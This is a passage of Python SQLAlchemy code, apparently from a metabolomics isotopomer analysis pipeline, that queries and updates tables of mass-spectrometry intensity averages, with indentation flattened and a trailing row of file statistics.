if data[i].abs_devFromTheoretical: dif = numpy.round(data[i].abs_devFromTheoretical,3)
else: dif = data[i].abs_devFromTheoretical;
row_measured_dif.append(dif)
i += 1;
else:
row_theoretical.append(None);
row_measured.append(None);
row_measured_cv.append(None);
row_measured_dif.append(None);
else:
row_theoretical.append(None);
row_measured.append(None);
row_measured_cv.append(None);
row_measured_dif.append(None);
row.extend(row_key);
row.extend(row_theoretical);
row.extend(row_measured);
row.extend(row_measured_cv);
row.extend(row_measured_dif);
row.extend(row_spectrum_accuracy);
data_O.append(row);
return data_O;
except SQLAlchemyError as e:
print(e);
# query used and comment from data_stage01_isotopomer_averages
def get_row_experimentID_dataStage01Averages(self,experiment_id_I):
'''Querry row information (used and comment) from data_stage01_isotopomer_averages'''
try:
data = self.session.query(data_stage01_isotopomer_averages.experiment_id,
data_stage01_isotopomer_averages.sample_name_abbreviation,
data_stage01_isotopomer_averages.sample_type,
data_stage01_isotopomer_averages.time_point,
data_stage01_isotopomer_averages.met_id,
data_stage01_isotopomer_averages.fragment_formula,
data_stage01_isotopomer_averages.fragment_mass,
data_stage01_isotopomer_averages.scan_type,
data_stage01_isotopomer_averages.used_,
data_stage01_isotopomer_averages.comment_).filter(
data_stage01_isotopomer_averages.experiment_id.like(experiment_id_I)).all();
data_O = [];
if not data:
print(('No row information found for experiment_id: ' + experiment_id_I));
return data_O;
else:
for d in data:
data_tmp = {};
data_tmp['experiment_id']=d.experiment_id;
data_tmp['sample_name_abbreviation']=d.sample_name_abbreviation;
data_tmp['sample_type']=d.sample_type;
data_tmp['time_point']=d.time_point;
data_tmp['met_id']=d.met_id;
data_tmp['fragment_formula']=d.fragment_formula;
data_tmp['fragment_mass']=d.fragment_mass;
data_tmp['scan_type']=d.scan_type;
data_tmp['used_']=d.used_;
data_tmp['comment_']=d.comment_;
data_O.append(data_tmp);
return data_O;
except SQLAlchemyError as e:
print(e);
## Query from data_stage01_isotopomer_averagesNormSum:
# query time points from data_stage01_isotopomer_averagesNormSum:
def get_timePoint_experimentID_dataStage01AveragesNormSum(self,experiment_id_I):
'''Querry time points that are used from the experiment'''
try:
time_points = self.session.query(data_stage01_isotopomer_averagesNormSum.time_point).filter(
data_stage01_isotopomer_averagesNormSum.experiment_id.like(experiment_id_I),
data_stage01_isotopomer_averagesNormSum.used_.is_(True)).group_by(
data_stage01_isotopomer_averagesNormSum.time_point).order_by(
data_stage01_isotopomer_averagesNormSum.time_point.asc()).all();
time_points_O = [];
for tp in time_points: time_points_O.append(tp.time_point);
return time_points_O;
except SQLAlchemyError as e:
print(e);
def get_timePoint_experimentIDAndSampleNameAbbreviation_dataStage01AveragesNormSum(self,experiment_id_I,sample_name_abbreviation_I):
'''Querry time points that are used from the experiment and sample name abbreviation'''
try:
time_points = self.session.query(data_stage01_isotopomer_averagesNormSum.time_point).filter(
data_stage01_isotopomer_averagesNormSum.experiment_id.like(experiment_id_I),
data_stage01_isotopomer_averagesNormSum.sample_name_abbreviation.like(sample_name_abbreviation_I),
data_stage01_isotopomer_averagesNormSum.used_.is_(True)).group_by(
data_stage01_isotopomer_averagesNormSum.time_point).order_by(
data_stage01_isotopomer_averagesNormSum.time_point.asc()).all();
time_points_O = [];
for tp in time_points: time_points_O.append(tp.time_point);
return time_points_O;
except SQLAlchemyError as e:
print(e);
# query sample name abbreviations from data_stage01_isotopomer_averagesNormSum:
def get_sampleNameAbbreviations_experimentIDAndSampleType_dataStage01AveragesNormSum(self,experiment_id_I,sample_type_I):
'''Querry sample name abbreviations that are used from
the experiment'''
try:
sample_name_abbreviations = self.session.query(
data_stage01_isotopomer_averagesNormSum.sample_name_abbreviation).filter(
data_stage01_isotopomer_averagesNormSum.experiment_id.like(experiment_id_I),
data_stage01_isotopomer_averagesNormSum.used_.is_(True),
data_stage01_isotopomer_averagesNormSum.sample_type.like(sample_type_I)).group_by(
data_stage01_isotopomer_averagesNormSum.sample_name_abbreviation).order_by(
data_stage01_isotopomer_averagesNormSum.sample_name_abbreviation).all();
sample_name_abbreviations_O = [];
for sn in sample_name_abbreviations:
sample_name_abbreviations_O.append(sn[0]);
return sample_name_abbreviations_O;
except SQLAlchemyError as e:
print(e);
def get_sampleNameAbbreviations_experimentIDAndSampleTypeAndTimePoint_dataStage01AveragesNormSum(self,experiment_id_I,sample_type_I,time_point_I):
'''Querry sample name abbreviations that are used from
the experiment for specific time-points'''
try:
sample_name_abbreviations = self.session.query(
data_stage01_isotopomer_averagesNormSum.sample_name_abbreviation).filter(
data_stage01_isotopomer_averagesNormSum.experiment_id.like(experiment_id_I),
data_stage01_isotopomer_averagesNormSum.used_.is_(True),
data_stage01_isotopomer_averagesNormSum.sample_type.like(sample_type_I),
data_stage01_isotopomer_averagesNormSum.time_point.like(time_point_I)).group_by(
data_stage01_isotopomer_averagesNormSum.sample_name_abbreviation).order_by(
data_stage01_isotopomer_averagesNormSum.sample_name_abbreviation).all();
sample_name_abbreviations_O = [];
for sn in sample_name_abbreviations:
sample_name_abbreviations_O.append(sn[0]);
return sample_name_abbreviations_O;
except SQLAlchemyError as e:
print(e);
# query scan types from data_stage01_isotopomer_averagesNormSum
def get_scanTypes_experimentIDAndTimePointAndSampleAbbreviationsAndSampleType_dataStage01AveragesNormSum(self,experiment_id_I,time_point_I,sample_name_abbreviations_I,sample_type_I):
'''Querry scan types that are used from the experiment for specific time-points and sample name abbreviations'''
try:
scan_types = self.session.query(
data_stage01_isotopomer_averagesNormSum.scan_type).filter(
data_stage01_isotopomer_averagesNormSum.experiment_id.like(experiment_id_I),
data_stage01_isotopomer_averagesNormSum.used_.is_(True),
data_stage01_isotopomer_averagesNormSum.time_point.like(time_point_I),
data_stage01_isotopomer_averagesNormSum.sample_type.like(sample_type_I),
data_stage01_isotopomer_averagesNormSum.sample_name_abbreviation.like(sample_name_abbreviations_I)).group_by(
data_stage01_isotopomer_averagesNormSum.scan_type).order_by(
data_stage01_isotopomer_averagesNormSum.scan_type).all();
scan_types_O = [];
for st in scan_types:
scan_types_O.append(st[0]);
return scan_types_O;
except SQLAlchemyError as e:
print(e);
# query met_ids from data_stage01_isotopomer_averagesNormSum
def get_metIDs_experimentIDAndSampleAbbreviationAndTimePointAndSampleTypeAndScanType_dataStage01AveragesNormSum(self,experiment_id_I,sample_name_abbreviation_I,time_point_I,sample_type_I,scan_type_I):
'''Querry met ids that are used for the experiment, sample abbreviation, time point, scan type'''
try:
met_ids = self.session.query(data_stage01_isotopomer_averagesNormSum.met_id).filter(
data_stage01_isotopomer_averagesNormSum.sample_name_abbreviation.like(sample_name_abbreviation_I),
data_stage01_isotopomer_averagesNormSum.experiment_id.like(experiment_id_I),
data_stage01_isotopomer_averagesNormSum.time_point.like(time_point_I),
data_stage01_isotopomer_averagesNormSum.sample_type.like(sample_type_I),
data_stage01_isotopomer_averagesNormSum.scan_type.like(scan_type_I),
data_stage01_isotopomer_averagesNormSum.used_.is_(True)).group_by(
data_stage01_isotopomer_averagesNormSum.met_id).order_by(
data_stage01_isotopomer_averagesNormSum.met_id.asc()).all();
met_ids_O = [];
if not(met_ids):
print("no results found")
print("experiment_id_I sample_name_abbreviation_I time_point_I scan_type_I");
print(experiment_id_I,sample_name_abbreviation_I,time_point_I,scan_type_I);
else:
for cn in met_ids:
met_ids_O.append(cn[0]);
return met_ids_O;
except SQLAlchemyError as e:
print(e);
# query fragment formulas from data_stage01_isotopomer_averagesNormSum
def get_fragmentFormula_experimentIDAndSampleAbbreviationAndTimePointAndSampleTypeAndScanTypeAndMetID_dataStage01AveragesNormSum(self,experiment_id_I,sample_name_abbreviation_I,time_point_I,sample_type_I,scan_type_I,met_id_I):
'''Querry fragments that are used for the experiment, sample abbreviation, time point, scan type, met id'''
try:
fragments = self.session.query(data_stage01_isotopomer_averagesNormSum.fragment_formula).filter(
data_stage01_isotopomer_averagesNormSum.sample_name_abbreviation.like(sample_name_abbreviation_I),
data_stage01_isotopomer_averagesNormSum.experiment_id.like(experiment_id_I),
data_stage01_isotopomer_averagesNormSum.time_point.like(time_point_I),
data_stage01_isotopomer_averagesNormSum.sample_type.like(sample_type_I),
data_stage01_isotopomer_averagesNormSum.scan_type.like(scan_type_I),
data_stage01_isotopomer_averagesNormSum.met_id.like(met_id_I),
data_stage01_isotopomer_averagesNormSum.used_.is_(True)).group_by(
data_stage01_isotopomer_averagesNormSum.fragment_formula).order_by(
data_stage01_isotopomer_averagesNormSum.fragment_formula.asc()).all();
fragments_O = [];
if not(fragments):
print("no results found")
print("experiment_id_I sample_name_abbreviation_I time_point_I scan_type_I met_id_I");
print(experiment_id_I,sample_name_abbreviation_I,time_point_I,scan_type_I,met_id_I);
else:
for cn in fragments:
fragments_O.append(cn[0]);
return fragments_O;
except SQLAlchemyError as e:
print(e);
# query spectrum from data_stage01_isotopomer_averagesNormSum
def get_spectrum_experimentIDAndSampleAbbreviationAndTimePointAndSampleTypeAndScanTypeAndMetIDAndFragmentFormula_dataStage01AveragesNormSum(self,experiment_id_I,sample_name_abbreviation_I,time_point_I,sample_type_I,scan_type_I,met_id_I,fragment_formula_I):
'''Querry fragments that are used for the experiment, sample abbreviation, time point, scan type, met id'''
try:
fragments = self.session.query(data_stage01_isotopomer_averagesNormSum.fragment_mass,
data_stage01_isotopomer_averagesNormSum.intensity_normalized_average,
data_stage01_isotopomer_averagesNormSum.intensity_normalized_cv).filter(
data_stage01_isotopomer_averagesNormSum.sample_name_abbreviation.like(sample_name_abbreviation_I),
data_stage01_isotopomer_averagesNormSum.experiment_id.like(experiment_id_I),
data_stage01_isotopomer_averagesNormSum.time_point.like(time_point_I),
data_stage01_isotopomer_averagesNormSum.sample_type.like(sample_type_I),
data_stage01_isotopomer_averagesNormSum.scan_type.like(scan_type_I),
data_stage01_isotopomer_averagesNormSum.met_id.like(met_id_I),
data_stage01_isotopomer_averagesNormSum.fragment_formula.like(fragment_formula_I),
data_stage01_isotopomer_averagesNormSum.used_.is_(True)).group_by(
data_stage01_isotopomer_averagesNormSum.fragment_mass,
data_stage01_isotopomer_averagesNormSum.intensity_normalized_average,
data_stage01_isotopomer_averagesNormSum.intensity_normalized_cv).order_by(
data_stage01_isotopomer_averagesNormSum.fragment_mass.asc()).all();
fragment_mass_O = [];
intensity_normalized_average_O = [];
intensity_normalized_cv_O = [];
if not(fragments):
print("no results found")
print("experiment_id_I sample_name_abbreviation_I time_point_I scan_type_I met_id_I fragment_forula_I");
print(experiment_id_I,sample_name_abbreviation_I,time_point_I,scan_type_I,met_id_I,fragment_forula_I);
else:
for cn in fragments:
fragment_mass_O.append(cn[0]);
intensity_normalized_average_O.append(cn[1]);
intensity_normalized_cv_O.append(cn[2]);
return intensity_normalized_average_O,intensity_normalized_cv_O,fragment_mass_O;
except SQLAlchemyError as e:
print(e);
# query normalized intensity from data_stage01_isotopomer_averagesNormSum
def get_dataProductFragment_experimentIDAndTimePointSampleAbbreviationAndSampleTypeAndScanTypeAndMetID_dataStage01AveragesNormSum(self,experiment_id_I,sample_name_abbreviation_I,time_point_I,sample_type_I,scan_type_I, met_id_I):
'''Querry peak data for a specific experiment_id, sample_name_abbreviation'''
try:
data = self.session.query(data_stage01_isotopomer_averagesNormSum.fragment_formula,
data_stage01_isotopomer_averagesNormSum.fragment_mass,
MS_components.product_fragment,
data_stage01_isotopomer_averagesNormSum.intensity_normalized_average,
data_stage01_isotopomer_averagesNormSum.intensity_normalized_cv,
data_stage01_isotopomer_averagesNormSum.intensity_theoretical,
data_stage01_isotopomer_averagesNormSum.abs_devFromTheoretical,
data_stage01_isotopomer_spectrumAccuracyNormSum.spectrum_accuracy,
data_stage01_isotopomer_averagesNormSum.scan_type).filter(
data_stage01_isotopomer_averagesNormSum.sample_name_abbreviation.like(sample_name_abbreviation_I),
data_stage01_isotopomer_averagesNormSum.experiment_id.like(experiment_id_I),
data_stage01_isotopomer_averagesNormSum.time_point.like(time_point_I),
data_stage01_isotopomer_averagesNormSum.sample_type.like(sample_type_I),
data_stage01_isotopomer_averagesNormSum.scan_type.like(scan_type_I),
data_stage01_isotopomer_averagesNormSum.met_id.like(met_id_I),
data_stage01_isotopomer_averagesNormSum.fragment_formula.like(MS_components.product_formula),
data_stage01_isotopomer_averagesNormSum.met_id.like(MS_components.met_id),
MS_components.ms_methodtype.like('tuning'),
data_stage01_isotopomer_averagesNormSum.used_,
data_stage01_isotopomer_spectrumAccuracyNormSum.sample_name_abbreviation.like(sample_name_abbreviation_I),
data_stage01_isotopomer_spectrumAccuracyNormSum.experiment_id.like(experiment_id_I),
data_stage01_isotopomer_spectrumAccuracyNormSum.time_point.like(time_point_I),
data_stage01_isotopomer_spectrumAccuracyNormSum.sample_type.like(sample_type_I),
data_stage01_isotopomer_spectrumAccuracyNormSum.scan_type.like(scan_type_I),
data_stage01_isotopomer_spectrumAccuracyNormSum.met_id.like(met_id_I),
data_stage01_isotopomer_spectrumAccuracyNormSum.used_.is_(True),
data_stage01_isotopomer_spectrumAccuracyNormSum.fragment_formula.like(MS_components.product_formula),
data_stage01_isotopomer_spectrumAccuracyNormSum.met_id.like(MS_components.met_id)).group_by(
data_stage01_isotopomer_averagesNormSum.fragment_formula,
data_stage01_isotopomer_averagesNormSum.fragment_mass,
MS_components.product_fragment,
data_stage01_isotopomer_averagesNormSum.intensity_normalized_average,
data_stage01_isotopomer_averagesNormSum.intensity_normalized_cv,
data_stage01_isotopomer_averagesNormSum.intensity_theoretical,
data_stage01_isotopomer_averagesNormSum.abs_devFromTheoretical,
data_stage01_isotopomer_spectrumAccuracyNormSum.spectrum_accuracy,
data_stage01_isotopomer_averagesNormSum.scan_type).order_by(
data_stage01_isotopomer_averagesNormSum.fragment_formula.desc(),
data_stage01_isotopomer_averagesNormSum.fragment_mass.asc()).all();
data_O = [];
if not data:
print('No normalized intensities found for the following:')
print('sample_name_abbreviation: ' + sample_name_abbreviation_I);
return data_O;
else:
# algorithm will break there is no data for a0 mass and there are jumps in the a values (i.e. a0 to a2);
fragment_formula = '';
fragment_formula_old = '';
data_cnt = len(data)-1;
i = 0;
while i <= data_cnt:
fragment_formula_old = data[i].fragment_formula;
row_key = [];
row_theoretical = [];
row_measured = [];
row_measured_cv = [];
row_measured_dif = [];
row_spectrum_accuracy = [];
row = [];
for a in range(50):
if i <= data_cnt:
fragment_formula = data[i].fragment_formula;
if fragment_formula == fragment_formula_old:
if a == 0:
# add key columns
row_key.append(sample_name_abbreviation_I);
row_key.append(time_point_I);
row_key.append(met_id_I);
row_key.append(data[i].fragment_formula);
row_key.append(str(data[i].product_fragment));
row_key.append(data[i].scan_type);
row_spectrum_accuracy.append(data[i].spectrum_accuracy);
mass0 = data[i].fragment_mass
massi = data[i].fragment_mass;
massDif = massi-mass0;
# add a+0... information
if data[i].intensity_theoretical: theoretical = numpy.round(data[i].intensity_theoretical,3);
else: theoretical = data[i].intensity_theoretical;
row_theoretical.append(theoretical)
if data[i].intensity_normalized_average: measured = numpy.round(data[i].intensity_normalized_average,3);
else: measured = data[i].intensity_normalized_average;
row_measured.append(measured)
if data[i].intensity_normalized_cv: cv = numpy.round(data[i].intensity_normalized_cv,3);
else: cv = data[i].intensity_normalized_cv;
row_measured_cv.append(cv);
if data[i].abs_devFromTheoretical: dif = numpy.round(data[i].abs_devFromTheoretical,3)
else: dif = data[i].abs_devFromTheoretical;
row_measured_dif.append(dif)
i += 1;
else:
row_theoretical.append(None);
row_measured.append(None);
row_measured_cv.append(None);
row_measured_dif.append(None);
else:
row_theoretical.append(None);
row_measured.append(None);
row_measured_cv.append(None);
row_measured_dif.append(None);
row.extend(row_key);
row.extend(row_theoretical);
row.extend(row_measured);
row.extend(row_measured_cv);
row.extend(row_measured_dif);
row.extend(row_spectrum_accuracy);
data_O.append(row);
return data_O;
except SQLAlchemyError as e:
print(e);
def get_dataPrecursorFragment_experimentIDAndTimePointSampleAbbreviationAndSampleTypeAndScanTypeAndMetID_dataStage01AveragesNormSum(self,experiment_id_I,sample_name_abbreviation_I,time_point_I,sample_type_I,scan_type_I, met_id_I):
'''Querry peak data for a specific experiment_id, sample_name_abbreviation'''
try:
data = self.session.query(data_stage01_isotopomer_averagesNormSum.fragment_formula,
data_stage01_isotopomer_averagesNormSum.fragment_mass,
MS_components.precursor_fragment,
data_stage01_isotopomer_averagesNormSum.intensity_normalized_average,
data_stage01_isotopomer_averagesNormSum.intensity_normalized_cv,
data_stage01_isotopomer_averagesNormSum.intensity_theoretical,
data_stage01_isotopomer_averagesNormSum.abs_devFromTheoretical,
data_stage01_isotopomer_spectrumAccuracyNormSum.spectrum_accuracy,
data_stage01_isotopomer_averagesNormSum.scan_type).filter(
data_stage01_isotopomer_averagesNormSum.sample_name_abbreviation.like(sample_name_abbreviation_I),
data_stage01_isotopomer_averagesNormSum.experiment_id.like(experiment_id_I),
data_stage01_isotopomer_averagesNormSum.time_point.like(time_point_I),
data_stage01_isotopomer_averagesNormSum.sample_type.like(sample_type_I),
data_stage01_isotopomer_averagesNormSum.scan_type.like(scan_type_I),
data_stage01_isotopomer_averagesNormSum.met_id.like(met_id_I),
data_stage01_isotopomer_averagesNormSum.fragment_formula.like(MS_components.precursor_formula),
data_stage01_isotopomer_averagesNormSum.met_id.like(MS_components.met_id),
MS_components.ms_methodtype.like('tuning'),
data_stage01_isotopomer_averagesNormSum.used_,
data_stage01_isotopomer_spectrumAccuracyNormSum.sample_name_abbreviation.like(sample_name_abbreviation_I),
data_stage01_isotopomer_spectrumAccuracyNormSum.experiment_id.like(experiment_id_I),
data_stage01_isotopomer_spectrumAccuracyNormSum.time_point.like(time_point_I),
data_stage01_isotopomer_spectrumAccuracyNormSum.sample_type.like(sample_type_I),
data_stage01_isotopomer_spectrumAccuracyNormSum.scan_type.like(scan_type_I),
data_stage01_isotopomer_spectrumAccuracyNormSum.met_id.like(met_id_I),
data_stage01_isotopomer_spectrumAccuracyNormSum.used_.is_(True),
data_stage01_isotopomer_spectrumAccuracyNormSum.fragment_formula.like(MS_components.precursor_formula),
data_stage01_isotopomer_spectrumAccuracyNormSum.met_id.like(MS_components.met_id)).group_by(
data_stage01_isotopomer_averagesNormSum.fragment_formula,
data_stage01_isotopomer_averagesNormSum.fragment_mass,
MS_components.precursor_fragment,
data_stage01_isotopomer_averagesNormSum.intensity_normalized_average,
data_stage01_isotopomer_averagesNormSum.intensity_normalized_cv,
data_stage01_isotopomer_averagesNormSum.intensity_theoretical,
data_stage01_isotopomer_averagesNormSum.abs_devFromTheoretical,
data_stage01_isotopomer_spectrumAccuracyNormSum.spectrum_accuracy,
data_stage01_isotopomer_averagesNormSum.scan_type).order_by(
data_stage01_isotopomer_averagesNormSum.fragment_formula.desc(),
data_stage01_isotopomer_averagesNormSum.fragment_mass.asc()).all();
data_O = [];
if not data:
print('No normalized intensities found for the following:')
print('sample_name_abbreviation: ' + sample_name_abbreviation_I);
return data_O;
else:
# algorithm will break there is no data for a0 mass and there are jumps in the a values (i.e. a0 to a2);
fragment_formula = '';
fragment_formula_old = '';
data_cnt = len(data)-1;
i = 0;
while i <= data_cnt:
fragment_formula_old = data[i].fragment_formula;
row_key = [];
row_theoretical = [];
row_measured = [];
row_measured_cv = [];
row_measured_dif = [];
row_spectrum_accuracy = [];
row = [];
for a in range(50):
if i <= data_cnt:
fragment_formula = data[i].fragment_formula;
if fragment_formula == fragment_formula_old:
if a == 0:
# add key columns
row_key.append(sample_name_abbreviation_I);
row_key.append(time_point_I);
row_key.append(met_id_I);
row_key.append(data[i].fragment_formula);
row_key.append(str(data[i].precursor_fragment));
row_key.append(data[i].scan_type);
row_spectrum_accuracy.append(data[i].spectrum_accuracy);
mass0 = data[i].fragment_mass
massi = data[i].fragment_mass;
massDif = massi-mass0;
# add a+0... information
if data[i].intensity_theoretical: theoretical = numpy.round(data[i].intensity_theoretical,3);
else: theoretical = data[i].intensity_theoretical;
row_theoretical.append(theoretical)
if data[i].intensity_normalized_average: measured = numpy.round(data[i].intensity_normalized_average,3);
else: measured = data[i].intensity_normalized_average;
row_measured.append(measured)
if data[i].intensity_normalized_cv: cv = numpy.round(data[i].intensity_normalized_cv,3);
else: cv = data[i].intensity_normalized_cv;
row_measured_cv.append(cv);
if data[i].abs_devFromTheoretical: dif = numpy.round(data[i].abs_devFromTheoretical,3)
else: dif = data[i].abs_devFromTheoretical;
row_measured_dif.append(dif)
i += 1;
else:
row_theoretical.append(None);
row_measured.append(None);
row_measured_cv.append(None);
row_measured_dif.append(None);
else:
row_theoretical.append(None);
row_measured.append(None);
row_measured_cv.append(None);
row_measured_dif.append(None);
row.extend(row_key);
row.extend(row_theoretical);
row.extend(row_measured);
row.extend(row_measured_cv);
row.extend(row_measured_dif);
row.extend(row_spectrum_accuracy);
data_O.append(row);
return data_O;
except SQLAlchemyError as e:
print(e);
# query row from data_stage01_isotopomer_averagesNormSum
def get_dataProductFragment_experimentIDAndSampleAbbreviation_dataStage01AveragesNormSum(self,experiment_id_I,sample_name_abbreviation_I):
'''Querry peak data for a specific experiment_id, sample_name_abbreviation'''
try:
data = self.session.query(data_stage01_isotopomer_averagesNormSum.fragment_formula,
data_stage01_isotopomer_averagesNormSum.fragment_mass,
data_stage01_isotopomer_averagesNormSum.intensity_normalized_average,
data_stage01_isotopomer_averagesNormSum.intensity_normalized_cv,
data_stage01_isotopomer_averagesNormSum.intensity_theoretical,
data_stage01_isotopomer_averagesNormSum.scan_type,
data_stage01_isotopomer_averagesNormSum.experiment_id,
data_stage01_isotopomer_averagesNormSum.time_point,
data_stage01_isotopomer_averagesNormSum.sample_type,
data_stage01_isotopomer_averagesNormSum.met_id,
data_stage01_isotopomer_averagesNormSum.sample_name_abbreviation,
MS_components.product_fragment).filter(
data_stage01_isotopomer_averagesNormSum.sample_name_abbreviation.like(sample_name_abbreviation_I),
data_stage01_isotopomer_averagesNormSum.experiment_id.like(experiment_id_I),
data_stage01_isotopomer_averagesNormSum.fragment_formula.like(MS_components.product_formula),
data_stage01_isotopomer_averagesNormSum.met_id.like(MS_components.met_id),
MS_components.ms_methodtype.like('tuning'),
data_stage01_isotopomer_averagesNormSum.used_).group_by(
data_stage01_isotopomer_averagesNormSum.fragment_formula,
data_stage01_isotopomer_averagesNormSum.fragment_mass,
data_stage01_isotopomer_averagesNormSum.intensity_normalized_average,
data_stage01_isotopomer_averagesNormSum.intensity_normalized_cv,
data_stage01_isotopomer_averagesNormSum.intensity_theoretical,
data_stage01_isotopomer_averagesNormSum.scan_type,
data_stage01_isotopomer_averagesNormSum.experiment_id,
data_stage01_isotopomer_averagesNormSum.time_point,
data_stage01_isotopomer_averagesNormSum.sample_type,
data_stage01_isotopomer_averagesNormSum.met_id,
data_stage01_isotopomer_averagesNormSum.sample_name_abbreviation,
MS_components.product_fragment).order_by(
data_stage01_isotopomer_averagesNormSum.sample_name_abbreviation.asc(),
data_stage01_isotopomer_averagesNormSum.sample_type.asc(),
data_stage01_isotopomer_averagesNormSum.met_id.asc(),
data_stage01_isotopomer_averagesNormSum.fragment_formula.desc(),
data_stage01_isotopomer_averagesNormSum.fragment_mass.asc()).all();
data_O = [];
if not data:
print('No normalized intensities found for the following:')
print('sample_name_abbreviation: ' + sample_name_abbreviation_I);
return data_O;
else:
for d in data:
#TODO:
data_O.append(d);
return data_O;
except SQLAlchemyError as e:
print(e);
def get_rows_experimentIDAndSampleAbbreviationAndTimePointAndSampleTypeAndScanTypeAndMetID_dataStage01AveragesNormSum(self,experiment_id_I,sample_name_abbreviation_I,time_point_I,sample_type_I,scan_type_I,met_id_I):
'''Querry rows that are used for the experiment, sample abbreviation, time point, scan type, met id'''
try:
rows = self.session.query(data_stage01_isotopomer_averagesNormSum).filter(
data_stage01_isotopomer_averagesNormSum.sample_name_abbreviation.like(sample_name_abbreviation_I),
data_stage01_isotopomer_averagesNormSum.experiment_id.like(experiment_id_I),
data_stage01_isotopomer_averagesNormSum.time_point.like(time_point_I),
data_stage01_isotopomer_averagesNormSum.sample_type.like(sample_type_I),
data_stage01_isotopomer_averagesNormSum.scan_type.like(scan_type_I),
data_stage01_isotopomer_averagesNormSum.met_id.like(met_id_I),
data_stage01_isotopomer_averagesNormSum.used_.is_(True)).all();
rows_O = [];
if not(rows):
print("no results found")
print("experiment_id_I sample_name_abbreviation_I time_point_I scan_type_I met_id_I");
print(experiment_id_I,sample_name_abbreviation_I,time_point_I,scan_type_I,met_id_I);
else:
for d in rows:
rows_O.append({
#'id':d.id,
'experiment_id':d.experiment_id,
'sample_name_abbreviation':d.sample_name_abbreviation,
'sample_type':d.sample_type,
'time_point':d.time_point,
'met_id':d.met_id,
'fragment_formula':d.fragment_formula,
'fragment_mass':d.fragment_mass,
'intensity_normalized_average':d.intensity_normalized_average,
'intensity_normalized_cv':d.intensity_normalized_cv,
'intensity_normalized_units':d.intensity_normalized_units,
'intensity_theoretical':d.intensity_theoretical,
'abs_devFromTheoretical':d.abs_devFromTheoretical,
'scan_type':d.scan_type,
'used_':d.used_,
'comment_':d.comment_});
return rows_O;
except SQLAlchemyError as e:
print(e);
def update_dataStage01IsotopomerAverages_usedAndComment(self,dataListUpdated_I):
# update used and comment fields of the data_stage01_isotopomer_averages
for d in dataListUpdated_I:
try:
data_update = self.session.query(data_stage01_isotopomer_averages).filter(
data_stage01_isotopomer_averages.experiment_id.like(d['experiment_id']),
data_stage01_isotopomer_averages.sample_name_abbreviation.like(d['sample_name_abbreviation']),
data_stage01_isotopomer_averages.time_point.like(d['time_point']),
data_stage01_isotopomer_averages.sample_type.like(d['sample_type']),
data_stage01_isotopomer_averages.met_id.like(d['met_id']),
data_stage01_isotopomer_averages.fragment_formula.like(d['fragment_formula']),
data_stage01_isotopomer_averages.fragment_mass == int(d['fragment_mass']),
data_stage01_isotopomer_averages.scan_type.like(d['scan_type'])
).update(
{
'used_':d['used_'],
'comment_':d['comment_']},
synchronize_session=False);
if data_update == 0:
print('row not found.')
print(d)
except SQLAlchemyError as e:
print(e);
self.session.commit();
def update_dataStage01IsotopomerAveragesNormSum_usedAndComment(self,dataListUpdated_I):
# update used and comment fields of the data_stage01_isotopomer_averagesNormSum
for d in dataListUpdated_I:
try:
data_update = self.session.query(data_stage01_isotopomer_averagesNormSum).filter(
data_stage01_isotopomer_averagesNormSum.experiment_id.like(d['experiment_id']),
data_stage01_isotopomer_averagesNormSum.sample_name_abbreviation.like(d['sample_name_abbreviation']),
data_stage01_isotopomer_averagesNormSum.time_point.like(d['time_point']),
data_stage01_isotopomer_averagesNormSum.sample_type.like(d['sample_type']),
data_stage01_isotopomer_averagesNormSum.met_id.like(d['met_id']),
data_stage01_isotopomer_averagesNormSum.fragment_formula.like(d['fragment_formula']),
data_stage01_isotopomer_averagesNormSum.fragment_mass == int(d['fragment_mass']),
data_stage01_isotopomer_averagesNormSum.scan_type.like(d['scan_type'])
).update(
{
'used_':d['used_'],
'comment_':d['comment_']},
synchronize_session=False);
if data_update == 0:
print('row not found.')
print(d)
except SQLAlchemyError as e:
print(e);
self.session.commit();
| 68.489097 | 260 | 0.632674 | 6,600 | 65,955 | 5.862121 | 0.029394 | 0.161256 | 0.198113 | 0.174929 | 0.931481 | 0.91786 | 0.906565 | 0.879452 | 0.850995 | 0.822952 | 0 | 0.018898 | 0.304405 | 65,955 | 962 | 261 | 68.560291 | 0.824426 | 0.053233 | 0 | 0.794872 | 0 | 0 | 0.028421 | 0.010116 | 0 | 0 | 0 | 0.00104 | 0 | 1 | 0.028986 | false | 0 | 0.010033 | 0 | 0.070234 | 0.06466 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.